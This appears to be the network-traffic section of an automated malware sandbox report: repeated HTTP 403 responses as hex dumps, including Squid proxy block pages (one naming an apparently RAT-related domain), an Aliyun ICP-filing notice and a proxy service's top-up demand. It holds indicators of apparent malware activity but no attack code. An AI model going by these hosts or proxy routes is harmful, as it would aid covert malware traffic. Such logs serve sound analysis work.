74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:34 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:34 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
